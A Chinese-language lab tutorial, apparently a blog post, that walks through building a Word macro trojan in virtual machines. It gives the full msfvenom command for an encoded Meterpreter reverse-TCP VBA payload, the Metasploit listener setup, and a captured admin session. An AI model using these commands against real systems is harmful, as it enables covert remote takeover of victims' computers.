天天看點

利用word漏洞制作Windows反彈木馬

實驗環境:Windows虛拟機一台IP位址為192.168.230.4,需安裝office,kali Linux虛拟機一台,IP位址192.168.230.10

實驗目的:拿下Windows控制權

實驗步驟:

一,部署實驗環境

1,Windows安裝word,配置IP位址

利用word漏洞制作Windows反彈木馬

二,使用kali生成payload

1,打開msf生成payload

指令行輸入msfconsole也可以打開

利用word漏洞制作Windows反彈木馬
msf6 > msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.230.10 LPORT=4444 -a x86 --platform windows-e x86/shikata_ga_nai -i 5 -f vba-exe    生成payload,-p指定payload,LHOST指定本機IP位址作為監聽,LPORT為本機監聽端口,-a架構 x86架構,--platform平台為Windows,-e指定編碼器
           
利用word漏洞制作Windows反彈木馬
利用word漏洞制作Windows反彈木馬
利用word漏洞制作Windows反彈木馬
利用word漏洞制作Windows反彈木馬
利用word漏洞制作Windows反彈木馬

打開宏檔案

利用word漏洞制作Windows反彈木馬

另存為反彈木馬

利用word漏洞制作Windows反彈木馬

2,進行監聽

msf6 > use exploit/multi/handler     
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp   設定payload
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 192.168.230.10    設定監聽IP位址
LHOST => 192.168.230.10
msf6 exploit(multi/handler) > set LPORT 4444     監聽端口
LPORT => 4444
msf6 exploit(multi/handler) > run   運作監聽器
           
利用word漏洞制作Windows反彈木馬
利用word漏洞制作Windows反彈木馬
利用word漏洞制作Windows反彈木馬

擷取到shell

meterpreter > getuid 檢視目前使用者,已經擷取到管理者權限

Server username: DESKTOP-QU8DCA3\admin

利用word漏洞制作Windows反彈木馬

【至此,實驗完成】

繼續閱讀